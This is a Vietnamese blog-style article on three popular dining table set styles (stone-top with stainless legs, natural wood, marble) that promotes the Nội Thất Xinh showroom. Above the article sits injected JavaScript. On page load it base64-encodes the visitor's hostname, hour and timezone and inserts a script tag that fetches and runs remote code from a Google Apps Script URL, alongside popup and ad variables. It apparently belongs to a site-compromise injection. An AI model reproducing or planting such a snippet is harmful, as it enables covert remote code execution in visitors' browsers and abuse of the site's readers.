var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Top 3 kiểu bàn ghế phòng ăn đẹp được yêu thích nhất nên mua

Bàn ghế phòng ăn là lựa chọn gần như không thể thiếu cho các không gian nhà bếp hiện đại. Sử dụng bộ bàn ghế ăn đẹp cũng giúp chủ nhân ăn uống thoải mái, khoa học và dễ bày trí món ăn hơn.
Nếu bạn đang tìm kiếm bộ bàn ghế phòng ăn chuẩn cho không gian nhà bếp tiện nghi, sang trọng và tinh tế hơn. Có thể tham khảo 3 kiểu bàn ghế phòng ăn đẹp được yêu thích nhất dưới đây.

Top 3 kiểu bàn ghế phòng ăn đẹp được yêu thích nhất nên mua
Những bộ bàn ghế phòng ăn đang trở thành lựa chọn cho không gian sống thêm hoàn hảo hơn

Bộ bàn ghế phòng ăn hiện đại mặt đá chân inox

Những bộ bàn ghế phòng ăn đẹp hiện nay được thiết kế rất đa dạng về mẫu mã, chất lượng và kiểu dáng. Trong đó, sử dụng chất liệu inox cao cấp đang rất được ưa chuộng. Nhất là các thiết kế bộ bàn ăn chân inox mặt đá giúp không gian mới lạ, sang trọng và độc đáo. Đồng thời tạo cảm giác gọn gàng tinh tế.

Top 3 kiểu bàn ghế phòng ăn đẹp được yêu thích nhất nên mua
Bộ bàn ghế phòng ăn đẹp chân inox mặt đá cao cấp thiết kế ghế ăn bọc da thường sử dụng trong sản xuất sofa cao cấp, giúp tăng thêm vẻ đẹp sang trọng cho không gian.

Kiểu bàn ghế phòng ăn đẹp gỗ tự nhiên

Các bộ bàn ghế phòng ăn bằng gỗ tự nhiên có ưu điểm tạo cảm giác ấm cúng, gần gũi. Đây là một trong những kiểu dáng bàn ghế phòng ăn cao cấp có độ bền đẹp rất tốt theo thời gian do chất liệu gỗ tốt, đã qua xử lý công nghệ chống mối mọt, chống cong vênh. Nên được nhiều gia đình lựa chọn đặt trong không gian nội thất nhà bếp.

Top 3 kiểu bàn ghế phòng ăn đẹp được yêu thích nhất nên mua
Bộ bàn ghế phòng ăn hiện đại chất liệu gỗ tự nhiên cao cấp

Mẫu bàn ghế phòng ăn mặt đá cẩm thạch

Ưu điểm bàn ghế phòng ăn mặt đá chính là độ bền và khả năng chống trầy xước, chống thấm và khả năng chịu nhiệt tốt. … Những bộ bàn ghế phòng ăn đẹp chất liệu mặt đá cao cấp thu hút được rất nhiều khách hàng bởi vẻ đẹp tự nhiên của đá và thêm sự sáng tạo nét hoa văn giúp bộ bàn ăn trở nên sang trọng và quý phái.
Trong các bộ bàn ghế phòng ăn ấn tượng không thể thiếu chất liệu mặt đá.

Top 3 kiểu bàn ghế phòng ăn đẹp được yêu thích nhất nên mua
Bộ bàn ghế phòng ăn đẹp thiết kế kiểu dáng Châu Âu hiện đại

Trên đây là gợi ý 3 kiểu bàn ghế phòng ăn hiện đang rất được ưa chuộng trên thi trường. Nếu bạn có ý định chọn bộ bàn ghế phòng ăn đẹp cho không gian sống hãy tham khảo ngay top những kiểu dáng bộ bàn ghế phòng ăn trên tại showroom Nội Thất Xinh. Nội Thất Xinh hiện đang là một trong các địa chỉ bán ghế sofa đẹp, bàn trà, kệ tivi, bàn ghế ăn rất nổi tiếng được nhiều khách hàng tìm đến chọn mua.